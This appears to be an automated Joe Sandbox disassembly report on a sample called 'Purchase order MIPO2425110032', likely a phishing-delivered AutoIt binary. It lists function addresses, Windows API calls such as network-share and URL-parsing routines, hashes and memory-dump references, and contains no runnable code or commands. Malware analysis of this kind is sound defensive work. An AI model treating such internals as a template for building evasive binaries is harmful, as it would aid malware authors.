                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                            Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00472BB2
                                                            • GetDC.USER32(00000000), ref: 00472BBB
                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                            Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd_noexit.LIBCMT ref: 00415150
                                                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                            • __freeptd.LIBCMT ref: 0041516B
                                                            • ExitThread.KERNEL32 ref: 00415173
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1454798553-0
                                                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                            Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _strncmp
                                                            • String ID: Q\E
                                                            • API String ID: 909875538-2189900498
                                                            • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                            • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                            • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                            Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                              • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                              • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                              • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 2652923123-3941886329
                                                            • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                            • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                            • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                            Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove_strncmp
                                                            • String ID: U$\
                                                            • API String ID: 2666721431-100911408
                                                            • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                            • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                            Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • __wcsnicmp.LIBCMT ref: 00467288
                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                            • String ID: LPT
                                                            • API String ID: 3035604524-1350329615
                                                            • Opcode ID: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                                            • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                            • Opcode Fuzzy Hash: d594f5019e475758e7693c5f8206312aa5aa41aafccdaeac4551e1936efcfcc9
                                                            • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                            Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$h
                                                            • API String ID: 4104443479-677774858
                                                            • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                            • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                            • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                            • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                            Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memcmp
                                                            • String ID: &
                                                            • API String ID: 2931989736-1010288
                                                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                            Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                            Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00466825
                                                            • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CrackInternet_wcslen
                                                            • String ID: |
                                                            • API String ID: 596671847-2343686810
                                                            • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                            • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                            • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                            • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                            Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: '
                                                            • API String ID: 3850602802-1997036262
                                                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                            Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                            • _sprintf.LIBCMT ref: 0040F9AE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove$_sprintf_strlen
                                                            • String ID: %02X
                                                            • API String ID: 1921645428-436463671
                                                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                            Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: Combobox
                                                            • API String ID: 3850602802-2096851135
                                                            • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                            • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                            • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                            • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                            Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: LengthMessageSendTextWindow
                                                            • String ID: edit
                                                            • API String ID: 2978978980-2167791130
                                                            • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                            • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                            • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                            • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                            Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
